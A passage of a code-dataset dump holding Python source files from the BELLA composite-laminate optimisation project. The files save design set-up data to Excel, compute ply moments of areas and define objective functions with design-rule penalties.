"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunction to save laminate design set-up\r\n\r\n- save_objective_function_BELLA:\r\n saves the objective function parameters on Sheet [Objective function]\r\n\r\n- save_multipanel:\r\n saves the data of the multipanel structure:\r\n - panel geometry\r\n - panel thickness targets\r\n - panel lamination parameter targets\r\n - lamination parameter first-level sensitivities\r\n - boundaries accross panels\r\n\r\n- save_constraints_BELLA\r\n save the design and manufacturing constraints on Sheet [Constraints]\r\n\r\n- save_parameters_BELLA\r\n saves the optimiser parameters on Sheet [Parameters]\r\n\r\n- save_materials\r\n saves the material properties on Sheet [Materials]\r\n\"\"\"\r\nimport sys\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.divers.excel import append_df_to_excel\r\nfrom src.CLA.lampam_functions import calc_lampam\r\nfrom src.BELLA.format_pdl import convert_sst_to_ss\r\nfrom src.guidelines.ipo_oopo import calc_penalty_ipo_oopo_mp\r\nfrom src.guidelines.contiguity import calc_penalty_contig_mp\r\nfrom src.guidelines.disorientation import calc_number_violations_diso_mp\r\nfrom src.guidelines.ten_percent_rule import calc_penalty_10_ss\r\nfrom src.guidelines.ply_drop_spacing import calc_penalty_spacing\r\nfrom src.buckling.buckling import buckling_factor\r\n\r\ndef save_materials(filename, materials):\r\n \"\"\"\r\n saves the material properties on Sheet [Materials]\r\n \"\"\"\r\n table_mat = pd.DataFrame()\r\n table_mat.loc[0, 'E11'] = materials.E11\r\n table_mat.loc[0, 'E22'] = materials.E22\r\n table_mat.loc[0, 'G12'] = materials.G12\r\n table_mat.loc[0, 'nu12'] = materials.nu12\r\n table_mat.loc[0, 'nu21'] = materials.nu21\r\n table_mat.loc[0, 'areal density'] = materials.density_area\r\n table_mat.loc[0, 'volumic density'] = materials.density_volume\r\n table_mat.loc[0, 'ply thickness'] = materials.ply_t\r\n\r\n table_mat.loc[0, 'Q11'] = materials.Q11\r\n table_mat.loc[0, 'Q12'] = materials.Q12\r\n table_mat.loc[0, 'Q22'] = materials.Q22\r\n table_mat.loc[0, 'Q66'] = materials.Q66\r\n\r\n table_mat.loc[0, 'U1'] = materials.U1\r\n table_mat.loc[0, 'U2'] = materials.U2\r\n table_mat.loc[0, 'U3'] = materials.U3\r\n table_mat.loc[0, 'U4'] = materials.U4\r\n table_mat.loc[0, 'U5'] = materials.U5\r\n\r\n table_mat = table_mat.transpose()\r\n\r\n append_df_to_excel(\r\n filename, table_mat, 'Materials', index=True, header=False)\r\n\r\n\r\ndef save_multipanel(\r\n filename, multipanel, obj_func_param, sst=None,\r\n calc_penalties=False, constraints=None, mat=None, save_buckling=False):\r\n \"\"\"\r\n saves the data of the multipanel structure:\r\n - panel geometry\r\n - panel thickness targets\r\n - panel lamination-parameter targets\r\n - lamination parameter first-level sensitivities\r\n - boundaries accross panels\r\n - constraints: design guidelines\r\n - sst: stacking sequence table\r\n \"\"\"\r\n table_mp = pd.DataFrame()\r\n table_mp.loc[0, 'Number of panels'] = multipanel.n_panels\r\n table_mp.loc[0, 'Number of plies max'] = multipanel.n_plies_max\r\n table_mp.loc[0, 'Area'] = multipanel.area_patches\r\n table_mp.loc[0, 'Area of all patches'] = multipanel.area_patches\r\n if mat is not None:\r\n table_mp.loc[0, 'Weight'] = multipanel.calc_weight(mat.density_area)\r\n table_mp.loc[0, 'Index of one thickest panel'] = multipanel.ind_thick\r\n table_mp.loc[0, 'Number of plies max'] = multipanel.n_plies_max\r\n\r\n if calc_penalties:\r\n # penalty_spacing\r\n penalty_spacing = calc_penalty_spacing(\r\n pdl=sst,\r\n multipanel=multipanel,\r\n constraints=constraints,\r\n on_blending_strip=False)\r\n table_mp.loc[0, 'Penalty spacing'] = penalty_spacing\r\n\r\n table_mp = table_mp.transpose()\r\n\r\n append_df_to_excel(\r\n filename, table_mp, 'Multipanel', index=True, header=False)\r\n\r\n table_p = pd.DataFrame()\r\n\r\n for ind_p, panel in enumerate(multipanel.panels):\r\n\r\n table_p.loc[ind_p, 'Panel ID'] = panel.ID\r\n table_p.loc[ind_p, 'Neighbour panel IDs'] \\\r\n = \" \".join(np.array(panel.neighbour_panels).astype(str))\r\n table_p.loc[ind_p, 'Number of plies'] = panel.n_plies\r\n\r\n table_p.loc[ind_p, 'Weighting in MP objective funtion'] = panel.weighting\r\n\r\n if panel.length_x and panel.length_y:\r\n table_p.loc[ind_p, 'Length_x'] = panel.length_x\r\n table_p.loc[ind_p, 'Length_y'] = panel.length_y\r\n table_p.loc[ind_p, 'Area'] = panel.area\r\n else:\r\n table_p.loc[ind_p, 'Area'] = panel.area\r\n\r\n if hasattr(panel, 'N_x'):\r\n table_p.loc[ind_p, 'N_x'] = panel.N_x\r\n table_p.loc[ind_p, 'N_y'] = panel.N_y\r\n\r\n if hasattr(panel, 'Weight'):\r\n table_p.loc[ind_p, 'Weight'] = panel.calc_weight(mat.density_area)\r\n\r\n for ind in range(12):\r\n table_p.loc[ind_p, 'lampam_target[' + str(ind + 1) + ']'] \\\r\n = panel.lampam_target[ind]\r\n for ind in range(12):\r\n table_p.loc[ind_p, 'lampam_weightings_ini[' + str(ind + 1) + ']'] \\\r\n = panel.lampam_weightings_ini[ind]\r\n for ind in range(12):\r\n table_p.loc[ind_p, 'lampam_weightings[' + str(ind + 1) + ']'] \\\r\n = panel.lampam_weightings[ind]\r\n\r\n if calc_penalties:\r\n ss = np.array(convert_sst_to_ss(sst))\r\n\r\n norm_diso_contig = np.array(\r\n [panel.n_plies for panel in multipanel.panels])\r\n n_diso = calc_number_violations_diso_mp(ss, constraints)\r\n if constraints.diso and n_diso.any():\r\n penalty_diso = n_diso / norm_diso_contig\r\n else:\r\n penalty_diso = np.zeros((multipanel.n_panels,))\r\n\r\n n_contig = calc_penalty_contig_mp(ss, constraints)\r\n if constraints.contig and n_contig.any():\r\n penalty_contig = n_contig / norm_diso_contig\r\n else:\r\n penalty_contig = np.zeros((multipanel.n_panels,))\r\n\r\n lampam = np.array([calc_lampam(ss[ind_panel]) \\\r\n for ind_panel in range(multipanel.n_panels)])\r\n\r\n if constraints.rule_10_percent and constraints.rule_10_Abdalla:\r\n penalty_10 = calc_penalty_10_ss(ss, constraints, lampam, mp=True)\r\n else:\r\n penalty_10 = calc_penalty_10_ss(ss, constraints, LPs=None)\r\n\r\n penalty_ipo, penalty_oopo = calc_penalty_ipo_oopo_mp(\r\n lampam, constraints)\r\n\r\n for ind_p, panel in enumerate(multipanel.panels):\r\n table_p.loc[ind_p, 'Penalty disorientation'] = penalty_diso[ind_p]\r\n table_p.loc[ind_p, 'Penalty contiguity'] = penalty_contig[ind_p]\r\n table_p.loc[ind_p, 'Penalty disorientation'] = penalty_diso[ind_p]\r\n table_p.loc[ind_p, 'Penalty contiguity'] = penalty_contig[ind_p]\r\n table_p.loc[ind_p, 'Penalty 10% rule'] = penalty_10[ind_p]\r\n table_p.loc[ind_p, 'Penalty balance'] = penalty_ipo[ind_p]\r\n table_p.loc[ind_p, 'Penalty out-of-plane orthotropy'] \\\r\n = penalty_oopo[ind_p]\r\n\r\n if save_buckling:\r\n for ind_p, panel in enumerate(multipanel.panels):\r\n table_p.loc[ind_p, 'lambda buckling'] = buckling_factor(\r\n lampam=panel.lampam_target,\r\n mat=mat,\r\n n_plies=panel.n_plies,\r\n N_x=panel.N_x,\r\n N_y=panel.N_y,\r\n length_x=panel.length_x,\r\n length_y=panel.length_y,\r\n n_modes=10)\r\n\r\n append_df_to_excel(\r\n filename, table_p, 'Panels', index=True, header=True)\r\n return 0\r\n\r\ndef save_constraints_BELLA(filename, constraints):\r\n \"\"\"\r\n saves the design and manufacturing constraints on Sheet [Constraints]\r\n \"\"\"\r\n table_const = pd.DataFrame()\r\n table_const.loc[0, 'symmetry'] = constraints.sym\r\n table_const.loc[0, 'balance'] = constraints.bal\r\n table_const.loc[0, 'out-of-plane orthotropy'] = constraints.oopo\r\n table_const.loc[0, 'damage tolerance'] = constraints.dam_tol\r\n table_const.loc[0, 'dam_tol_rule'] = constraints.dam_tol_rule\r\n table_const.loc[0, 'covering'] = constraints.covering\r\n table_const.loc[0, 'n_covering'] = constraints.n_covering\r\n table_const.loc[0, '10% rule'] = constraints.rule_10_percent\r\n table_const.loc[0, '10% rule applied on LPs'] \\\r\n = constraints.rule_10_percent and constraints.rule_10_Abdalla\r\n table_const.loc[0, '10% rule applied on ply percentages'] \\\r\n = constraints.rule_10_percent and not constraints.rule_10_Abdalla\r\n if constraints.rule_10_percent:\r\n table_const.loc[0, 'percentage limit when rule applied on LPs'] \\\r\n = constraints.percent_Abdalla * 100\r\n table_const.loc[0, 'percent_0'] = constraints.percent_0 * 100\r\n table_const.loc[0, 'percent_45'] = constraints.percent_45 * 100\r\n table_const.loc[0, 'percent_90'] = constraints.percent_90 * 100\r\n table_const.loc[0, 'percent_-45'] = constraints.percent_135 * 100\r\n table_const.loc[0, 'percent_+-45'] = constraints.percent_45_135 * 100\r\n else:\r\n table_const.loc[0, 'percentage limit when rule applied on LPs'] = 0\r\n table_const.loc[0, 'percent_0'] = 0\r\n table_const.loc[0, 'percent_45'] = 0\r\n table_const.loc[0, 'percent_90'] = 0\r\n table_const.loc[0, 'percent_-45'] = 0\r\n table_const.loc[0, 'percent_+-45'] = 0\r\n table_const.loc[0, 'diso'] = constraints.diso\r\n table_const.loc[0, 'delta_angle'] = constraints.delta_angle\r\n table_const.loc[0, 'contig'] = constraints.contig\r\n table_const.loc[0, 'n_contig'] = constraints.n_contig_c\r\n sets = np.array(constraints.set_of_angles, dtype=str)\r\n table_const.loc[0, 'fibre orientations'] = ' '.join(sets)\r\n table_const.loc[0, 'number fibre orientations'] \\\r\n = constraints.n_set_of_angles\r\n # table_const.loc[0, 'n_plies_min'] = constraints.n_plies_min\r\n # table_const.loc[0, 'n_plies_max'] = constraints.n_plies_max\r\n table_const.loc[0, 'ply drop spacing rule'] \\\r\n = constraints.pdl_spacing\r\n table_const.loc[0, 'minimum number of continuous plies between ply drops']\\\r\n = constraints.min_drop\r\n\r\n table_const = table_const.transpose()\r\n\r\n append_df_to_excel(\r\n filename, table_const, 'Constraints', index=True, header=False)\r\n\r\ndef save_parameters_BELLA(filename, parameters):\r\n \"\"\"\r\n saves the optimiser parameters on Sheet [Parameters]\r\n \"\"\"\r\n table_param = pd.DataFrame()\r\n\r\n # Parameters of BELLA step 2\r\n table_param.loc[0, 'number of initial ply drops'] \\\r\n = parameters.n_ini_ply_drops\r\n table_param.loc[0, 'minimum group size'] = parameters.group_size_min\r\n table_param.loc[0, 'maximum group size'] = parameters.group_size_max\r\n table_param.loc[0, 'time_limit_group_pdl'] = parameters.time_limit_group_pdl\r\n table_param.loc[0, 'time_limit_all_pdls'] = parameters.time_limit_all_pdls\r\n table_param.loc[0, 'global_node_limit'] \\\r\n = parameters.global_node_limit\r\n table_param.loc[0, 'global_node_limit_final'] \\\r\n = parameters.global_node_limit_final\r\n table_param.loc[0, 'local_node_limit'] \\\r\n = parameters.local_node_limit\r\n table_param.loc[0, 'local_node_limit_final'] \\\r\n = parameters.local_node_limit_final\r\n\r\n # Parameters of BELLA step 4.1\r\n table_param.loc[0, 'input number of plies in reference panel'] \\\r\n = parameters.n_plies_ref_panel\r\n table_param.loc[0, 'repair_membrane_switch'] \\\r\n = parameters.repair_membrane_switch\r\n table_param.loc[0, 'repair_flexural_switch'] \\\r\n = parameters.repair_flexural_switch\r\n table_param.loc[0, 'p_A'] \\\r\n = parameters.p_A\r\n table_param.loc[0, 'n_D1'] \\\r\n = parameters.n_D1\r\n table_param.loc[0, 'n_D2'] \\\r\n = parameters.n_D2\r\n table_param.loc[0, 'n_D3'] \\\r\n = parameters.n_D3\r\n\r\n # Parameters of BELLA step 4.2\r\n table_param.loc[0, 'global_node_limit2'] \\\r\n = parameters.global_node_limit2\r\n table_param.loc[0, 'local_node_limit2'] \\\r\n = parameters.local_node_limit2\r\n\r\n # Parameters of BELLA step 4.3\r\n table_param.loc[0, 'global_node_limit3'] \\\r\n = parameters.global_node_limit3\r\n table_param.loc[0, 'local_node_limit3'] \\\r\n = parameters.local_node_limit3\r\n\r\n table_param = table_param.transpose()\r\n\r\n append_df_to_excel(\r\n filename, table_param, 'Parameters', index=True, header=False)\r\n\r\n\r\ndef save_objective_function_BELLA(filename, obj_func_param):\r\n \"\"\"\r\n saves the objective function parameters on Sheet [Objective function]\r\n \"\"\"\r\n table_obj_func = pd.DataFrame()\r\n\r\n # General parameters of BELLA\r\n table_obj_func.loc[0, 'optimisation problem'] = \"LP matching\"\r\n\r\n# for ind in range(12):\r\n# table_obj_func.loc[0, 'lampam_weightings[' + str(ind + 1) + ']'] \\\r\n# = obj_func_param.lampam_weightings[ind]\r\n#\r\n# for ind_p in range(obj_func_param.panel_weightings_ini.size):\r\n# table_obj_func.loc[0, 'panel_weightings_ini[' + str(ind_p + 1) + ']'] \\\r\n# = obj_func_param.panel_weightings_ini[ind_p]\r\n\r\n # Penalty coefficients\r\n table_obj_func.loc[0, 'coeff_contig'] = obj_func_param.coeff_contig\r\n table_obj_func.loc[0, 'coeff_diso'] = obj_func_param.coeff_diso\r\n table_obj_func.loc[0, 'coeff_10'] = obj_func_param.coeff_10\r\n table_obj_func.loc[0, 'coeff_bal_ipo'] = obj_func_param.coeff_bal_ipo\r\n table_obj_func.loc[0, 'coeff_oopo'] = obj_func_param.coeff_oopo\r\n table_obj_func.loc[0, 'coeff_spacing'] = obj_func_param.coeff_spacing\r\n\r\n table_obj_func = table_obj_func.transpose()\r\n\r\n append_df_to_excel(filename, table_obj_func, 'Objective function',\r\n index=True, header=False)"
},
{
"alpha_fraction": 0.5396360754966736,
"alphanum_fraction": 0.5590880513191223,
"avg_line_length": 33.94736862182617,
"blob_id": "205e596d6618ffa0e74c1406161292639926ce60",
"content_id": "d1ae97f2325199c33f58676d2ccdb56a20de9c92",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4781,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 133,
"path": "/src/LAYLA_V02/moment_of_areas.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunctions to calculate moments of areas\r\n\r\n\"\"\"\r\n__version__ = '2.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport numpy as np\r\n\r\n\r\ndef calc_mom_of_areas(constraints, targets, ply_order, n_plies_in_groups):\r\n \"\"\"\r\n calulates ply moments of areas\r\n\r\n OUTPUS\r\n\r\n - mom_areas[ply_index, 0]: signed area of ply of index 'ply_index'\r\n - mom_areas[ply_index, 1]: signed first moment of area of ply of index\r\n 'ply_index'\r\n - mom_areas[ply_index, 2]: signed second moment of area of ply of index\r\n 'ply_index'\r\n\r\n - cummul_mom_areas[:, 0/1/2]: cummulated areas/first/second moments of\r\n areas of the plies in the order in which plies are optimised\r\n\r\n - group_mom_areas[:, 0/1/2]: cummulated areas/first/second moments of\r\n areas of ply groups in the order in which plies are optimised\r\n\r\n INPUTS\r\n\r\n - constraints: lay-up design guidelines\r\n - targets: target lamination parameters and ply counts\r\n - ply_order: ply indices sorted in the order in which plies are optimised\r\n - n_plies_in_groups: number of plies in each group of plies\r\n \"\"\"\r\n group_mom_areas = np.zeros((n_plies_in_groups.size, 3), float)\r\n\r\n if constraints.sym:\r\n\r\n ply_indices = np.arange(targets.n_plies // 2 + targets.n_plies % 2)\r\n mom_areas = np.zeros((\r\n targets.n_plies // 2 + targets.n_plies % 2, 3), float)\r\n\r\n pos_bot = (2 / targets.n_plies) * ply_indices - 1\r\n pos_top = (2 / targets.n_plies) * (ply_indices + 1) - 1\r\n\r\n if targets.n_plies % 2:\r\n pos_top[-1] = 0\r\n\r\n mom_areas[:, 0] = pos_top - pos_bot\r\n mom_areas[:, 1] = pos_top**2 - pos_bot**2\r\n mom_areas[:, 2] = pos_top**3 - pos_bot**3\r\n\r\n n_plies_in_group = 0\r\n ind_ply_group = 0\r\n mom_areas_ply_group = np.zeros((3,), float)\r\n\r\n cummul_mom_areas = np.zeros((\r\n targets.n_plies // 2 + targets.n_plies % 2, 3), float)\r\n\r\n for ply_index in range(targets.n_plies // 2 + targets.n_plies % 2):\r\n\r\n cummul_mom_areas[ply_index:, :] += abs(mom_areas[ply_index, :])\r\n\r\n n_plies_in_group += 1\r\n mom_areas_ply_group += abs(mom_areas[ply_index, :])\r\n\r\n if n_plies_in_group == n_plies_in_groups[ind_ply_group]:\r\n group_mom_areas[ind_ply_group, :] = mom_areas_ply_group\r\n ind_ply_group += 1\r\n n_plies_in_group = 0\r\n mom_areas_ply_group = np.zeros((3,), float)\r\n\r\n else:\r\n mom_areas = np.zeros((targets.n_plies, 3), float)\r\n cummul_mom_areas = np.zeros((targets.n_plies, 3), float)\r\n\r\n ply_indices = np.arange(targets.n_plies)\r\n pos_bot = ((2 / targets.n_plies) * ply_indices - 1)[ply_order]\r\n pos_top = ((2 / targets.n_plies) * (ply_indices + 1) - 1)[ply_order]\r\n\r\n mom_areas[:, 0] = pos_top - pos_bot\r\n mom_areas[:, 1] = pos_top**2 - pos_bot**2\r\n mom_areas[:, 2] = pos_top**3 - pos_bot**3\r\n mom_areas /= 2\r\n\r\n n_plies_in_group = 0\r\n ind_ply_group = 0\r\n mom_areas_ply_group = np.zeros((3,), float)\r\n\r\n for ply_index in range(targets.n_plies - 1):\r\n\r\n cummul_mom_areas[ply_index:, :] += abs(mom_areas[ply_index, :])\r\n\r\n n_plies_in_group += 1\r\n mom_areas_ply_group[:] += abs(mom_areas[ply_index, :])\r\n\r\n if n_plies_in_group == n_plies_in_groups[ind_ply_group]:\r\n group_mom_areas[ind_ply_group, :] = mom_areas_ply_group\r\n ind_ply_group += 1\r\n n_plies_in_group = 0\r\n mom_areas_ply_group = np.zeros((3,), float)\r\n\r\n pos_mom_areas = np.array([\r\n (abs(pos_top[-1]) + abs(pos_bot[-1])) / 2,\r\n (abs(pos_top[-1]**2) + abs(pos_bot[-1]**2)) / 2,\r\n (abs(pos_top[-1]**3) + abs(pos_bot[-1]**3)) / 2])\r\n\r\n cummul_mom_areas[-1, :] += pos_mom_areas\r\n mom_areas_ply_group += pos_mom_areas\r\n group_mom_areas[-1, :] += mom_areas_ply_group\r\n\r\n return mom_areas, cummul_mom_areas, group_mom_areas\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print('*** Test for the functions calc_moment_of_areas ***\\n')\r\n import sys\r\n sys.path.append(r'C:\\BELLA_and_LAYLA')\r\n\r\n from src.LAYLA_V02.constraints import Constraints\r\n from src.LAYLA_V02.targets import Targets\r\n from src.LAYLA_V02.ply_order import calc_ply_order\r\n constraints = Constraints(sym=True)\r\n targets = Targets(n_plies=21)\r\n ply_order = calc_ply_order(constraints, targets)\r\n n_plies_in_groups = np.array([5, 6])\r\n mom_areas, cummul_mom_areas, group_mom_areas = calc_mom_of_areas(\r\n constraints, targets, ply_order, n_plies_in_groups)\r\n print(mom_areas)\r\n print(cummul_mom_areas)\r\n print(group_mom_areas, sum(group_mom_areas))\r\n"
},
{
"alpha_fraction": 0.5929980278015137,
"alphanum_fraction": 0.6026627421379089,
"avg_line_length": 38.390438079833984,
"blob_id": "ac7ea80ad1f2f614a380d838d1debd972dc84292",
"content_id": "34dc263e84c45836e06c611a0e0e974c075642f2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10140,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 251,
"path": "/src/BELLA/objectives.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nobjective functions\r\n\r\n- calc_obj_one_panel\r\n calculates objective function value for a single panel during beam_search\r\n with no consideration of the penalties for the design rules\r\n\r\n- calc_obj_each_panel\r\n calculates objective function of multi-panel structures during beam search\r\n with no consideration of the penalties for the design rules\r\n\r\n- calc_obj_multi_panel\r\n calculates objective function of a multi_panel structure considering the\r\n penalties for the design and manufacturing guidelines\r\n\r\n- calc_unconst_obj_multi_panel_A\r\n calculates the unconstrained in-plane objective function values for\r\n multi-panel structures\r\n\r\n- calc_unconst_obj_multi_panel_D\r\n calculates the unconstrained out-of-plane objective function values for\r\n multi-panel structures\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.buckling.buckling import buckling_factor\r\n\r\ndef calc_obj_one_panel(\r\n lampam,\r\n lampam_target,\r\n lampam_weightings=np.array([])):\r\n \"\"\"\r\n calculates objective function value for a single panel during beam_search\r\n with no consideration of the penalties for the design rules\r\n\r\n INPUTS\r\n\r\n - lampam: panel lamination parameters\r\n - lampam_target: target lamination parameters\r\n - lampam_weightings: weights of the lamination parameters in the objective\r\n function\r\n - obj_func_param: objective function parameters\r\n \"\"\"\r\n return lampam_weightings@((lampam - lampam_target)**2)\r\n\r\n\r\ndef calc_obj_each_panel(\r\n multipanel, lampam, obj_func_param, mat=0, lampam_weightings=[]):\r\n \"\"\"\r\n calculates objective function of multi-panel structures during beam search\r\n with no consideration of the penalties for the design rules\r\n\r\n INPUTS\r\n\r\n - multipanel: multi-panel class instance\r\n - lampam: group partial lamination parameters\r\n - lampam_weightings: weightings for each lamination parameter\r\n - mat: material properties of the laminae\r\n - obj_func_param: objective function parameters\r\n \"\"\"\r\n objectives = np.zeros((multipanel.reduced.n_panels), dtype=float)\r\n\r\n for ind_panel, panel in enumerate(multipanel.reduced.panels):\r\n\r\n# print('lampam[ind_panel]', lampam[ind_panel])\r\n# print('panel.lampam_target', panel.lampam_target)\r\n# print('lampam_weightings[ind_panel]', lampam_weightings[ind_panel])\r\n\r\n objectives[ind_panel] = calc_obj_one_panel(\r\n lampam=lampam[ind_panel],\r\n lampam_target=panel.lampam_target,\r\n lampam_weightings=lampam_weightings[ind_panel])\r\n \r\n return objectives\r\n\r\n\r\ndef calc_obj_multi_panel(\r\n objective,\r\n actual_panel_weightings,\r\n penalty_diso=0,\r\n penalty_contig=0,\r\n penalty_10=0,\r\n penalty_bal_ipo=0,\r\n penalty_oopo=0,\r\n penalty_weight=0,\r\n coeff_diso=0,\r\n coeff_contig=0,\r\n coeff_10=0,\r\n coeff_bal_ipo=0,\r\n coeff_oopo=0,\r\n coeff_weight=0,\r\n with_Nones=False):\r\n \"\"\"\r\n calculates objective function of a multi_panel structure considering the\r\n penalties for the design and manufacturing guidelines\r\n\r\n INPUTS\r\n\r\n - objective: objective function value of each panel with no\r\n consideration of the penalties for the design rules\r\n - actual_panel_weightings: weightings of the different panels in the\r\n objective function\r\n - penalty_diso: penalty of each panel for the disorientation constraint\r\n - penalty_contig: penalty of each panel for the contiguity constraint\r\n - penalty_10: penalty of each panel for the 10% rule constraint\r\n - penalty_bal_ipo: penalty of each panel for in-plane orthotropy/balance\r\n - penalty_oopo: penalty of each panel for out-of-plane orthotropy\r\n - penalty_weight: penalty of each panel for weight\r\n - coeff_diso: weight of the penalty for the disorientation rule\r\n - coeff_contig: weight of the penalty for the contiguity rule\r\n - coeff_10: weight of the penalty for the 10% rule\r\n - coeff_bal_ipo: weight of the penalty for in-plane orthotropy/balance\r\n - coeff_oopo: weight of the penalty for out-of-plane orthotropy\r\n - coeff_weight: weight of the penalty for weight\r\n \"\"\"\r\n# print(penalty_weight)\r\n# print(penalty_diso)\r\n# print(penalty_contig)\r\n# print(penalty_bal_ipo)\r\n# print(penalty_oopo)\r\n# print(penalty_10)\r\n# print(objective)\r\n if not with_Nones:\r\n return sum(actual_panel_weightings * objective \\\r\n * (1 + coeff_diso * penalty_diso) \\\r\n * (1 + coeff_contig * penalty_contig) \\\r\n * (1 + coeff_10 * penalty_10) \\\r\n * (1 + coeff_bal_ipo * penalty_bal_ipo) \\\r\n * (1 + coeff_oopo * penalty_oopo) \\\r\n * (1 + coeff_weight * penalty_weight))\r\n my_sum = 0\r\n for ind in range(actual_panel_weightings.size):\r\n if objective[ind] is not None:\r\n to_add = actual_panel_weightings[ind] * objective[ind]\r\n \r\n if penalty_diso is not None:\r\n if (isinstance(penalty_diso, list) \\\r\n and len(penalty_diso) > 1) or penalty_diso.size > 1:\r\n to_add *= (1 + coeff_diso * penalty_diso[ind])\r\n else:\r\n to_add *= (1 + coeff_diso * penalty_diso)\r\n \r\n if penalty_contig is not None:\r\n if (isinstance(penalty_contig, list) \\\r\n and len(penalty_contig) > 1) or penalty_contig.size > 1:\r\n to_add *= (1 + coeff_contig * penalty_contig[ind])\r\n else:\r\n to_add *= (1 + coeff_contig * penalty_contig)\r\n\r\n if penalty_10 is not None:\r\n if (isinstance(penalty_10, list) and len(penalty_10) > 1) \\\r\n or penalty_10.size > 1:\r\n to_add *= (1 + coeff_10 * penalty_10[ind])\r\n else:\r\n to_add *= (1 + coeff_10 * penalty_10)\r\n\r\n if penalty_oopo is not None:\r\n if (isinstance(penalty_oopo, list) \\\r\n and len(penalty_oopo) > 1) or penalty_oopo.size > 1:\r\n to_add *= (1 + coeff_oopo * penalty_oopo[ind])\r\n else:\r\n to_add *= (1 + coeff_oopo * penalty_oopo)\r\n\r\n if penalty_bal_ipo is not None:\r\n to_add *= (1 + coeff_bal_ipo * penalty_bal_ipo[ind])\r\n\r\n if penalty_weight is not None:\r\n to_add *= (1 + coeff_weight * penalty_weight[ind])\r\n\r\n my_sum += to_add\r\n return my_sum\r\n\r\ndef calc_unconst_obj_multi_panel_A(\r\n multipanel, lampamA, obj_func_param, inner_step=-1, mat=0):\r\n \"\"\"\r\n calculates unconstrained in-plane objective function for multi-panel\r\n structures\r\n\r\n INPUTS\r\n\r\n - multipanel: multi-panel class instance\r\n - lampamA: in-plane partial lamination parameters\r\n - inner_step: inner loop step number\r\n - mat: material properties of the laminae\r\n - obj_func_param: objective function parameters\r\n \"\"\"\r\n objectives = np.zeros((multipanel.reduced.n_panels), dtype=float)\r\n if inner_step == -1:\r\n for ind_reduced_panel in range(multipanel.reduced.n_panels):\r\n objectives[ind_reduced_panel] = calc_obj_one_panel(\r\n lampam=lampamA[ind_reduced_panel],\r\n lampam_target=multipanel.panels[\r\n multipanel.ind_for_reduc[\r\n ind_reduced_panel]].lampam_target[:4],\r\n lampam_weightings=multipanel.panels[\r\n multipanel.ind_for_reduc[\r\n ind_reduced_panel]].lampam_weightings[:4])\r\n else:\r\n for ind_reduced_panel in range(multipanel.reduced.n_panels):\r\n objectives[ind_reduced_panel] = calc_obj_one_panel(\r\n lampam=lampamA[ind_reduced_panel],\r\n lampam_target=multipanel.panels[\r\n multipanel.ind_for_reduc[\r\n ind_reduced_panel]].lampam_target[:4],\r\n lampam_weightings=multipanel.panels[\r\n multipanel.ind_for_reduc[\r\n ind_reduced_panel]].lampam_weightings[:4])\r\n return sum(obj_func_param.reduced_actual_panel_weightingsA * objectives)\r\n\r\ndef calc_unconst_obj_multi_panel_D(\r\n multipanel, lampamD, obj_func_param, inner_step=-1, mat=0):\r\n \"\"\"\r\n calculates the unconstrained out-of-plane objective function values for\r\n multi-panel structures\r\n\r\n INPUTS\r\n\r\n - multipanel: multi-panel class instance\r\n - lampamD: out-of-plane partial lamination parameters\r\n - inner_step: inner loop step number\r\n - mat: material properties of the laminae\r\n - obj_func_param: objective function parameters\r\n \"\"\"\r\n objectives = np.zeros((multipanel.reduced.n_panels), dtype=float)\r\n if inner_step == -1:\r\n for ind_reduced_panel in range(multipanel.reduced.n_panels):\r\n objectives[ind_reduced_panel] = calc_obj_one_panel(\r\n lampam=lampamD[ind_reduced_panel],\r\n lampam_target=multipanel.panels[\r\n multipanel.ind_for_reduc[\r\n ind_reduced_panel]].lampam_target[8:12],\r\n lampam_weightings=multipanel.panels[\r\n multipanel.ind_for_reduc[\r\n ind_reduced_panel]].lampam_weightings[8:12])\r\n else:\r\n for ind_reduced_panel in range(multipanel.reduced.n_panels):\r\n objectives[ind_reduced_panel] = calc_obj_one_panel(\r\n lampam=lampamD[ind_reduced_panel],\r\n lampam_target=multipanel.panels[\r\n multipanel.ind_for_reduc[\r\n ind_reduced_panel]].lampam_target[8:12],\r\n lampam_weightings=multipanel.panels[\r\n multipanel.ind_for_reduc[\r\n ind_reduced_panel]].lampam_weightings[8:12])\r\n return sum(obj_func_param.reduced_actual_panel_weightingsD * objectives)\r\n\r\n"
},
{
"alpha_fraction": 0.32939377427101135,
"alphanum_fraction": 0.3526574969291687,
"avg_line_length": 38.0095100402832,
"blob_id": "bc5fd8d4d32c795540d20e298968ba8cbe83a60c",
"content_id": "b6ba1aa4e056bd3d9565770507c3ae49bf367a18",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 29445,
"license_type": "permissive",
"max_line_length": 103,
"num_lines": 736,
"path": "/src/guidelines/external_contig.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
